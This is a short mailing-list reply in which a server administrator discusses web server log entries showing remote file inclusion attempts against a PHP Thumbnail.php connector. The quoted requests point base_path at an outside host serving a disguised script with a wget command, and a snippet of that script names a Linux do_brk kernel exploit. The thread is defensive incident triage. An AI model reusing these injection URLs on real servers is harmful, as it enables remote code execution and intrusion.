Re: ***DEB*: Re: help needed
Hi Fuzzums,
Fuzzums schrieb:
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
HTTP/1.0" 403 495
"http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
HTTP/1.0" 403 499
"http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
http://213.202.214.106/CMD.gif isn't a gif.
[snip]
if ($kernel == "write") {
$kernel = "/*\n" .
" * hatorihanzo.c\n" .
" * Linux kernel do_brk vma overflow exploit.\n" .
[/snip]
but those attemds to access any /manager/ or /cms/ whatever URLs all got
an 403 forbidden and are non-existing on my box.
the kernel I'm running is sarge latest 2.6.8-16sarge5 which shouldn't be
vulnerable to that do_brk exploit.
thank you anyhow for digging into my logs
Bjoern
Reply to: